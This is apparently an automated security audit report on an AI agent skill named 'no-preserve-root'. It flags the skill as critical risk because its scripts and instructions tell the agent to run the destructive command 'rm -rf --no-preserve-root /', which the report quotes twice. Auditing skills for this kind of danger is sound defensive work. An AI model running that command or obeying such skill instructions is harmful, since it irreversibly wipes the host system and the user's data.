no-preserve-root
Fail
Audited by Snyk on Apr 20, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). Contains explicit destructive shell commands (rm -rf --no-preserve-root /) that are clearly intended to irreversibly delete the root filesystem, indicating deliberate malicious intent to compromise and destroy a system.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt explicitly instructs running destructive privileged commands ("rm -rf --no-preserve-root /") that will irreversibly delete the root filesystem and thus compromise the machine.
Issues (2)
E006
CRITICALMalicious code pattern detected in skill scripts.
W013
MEDIUMAttempt to modify system services in skill instructions.
Audit Metadata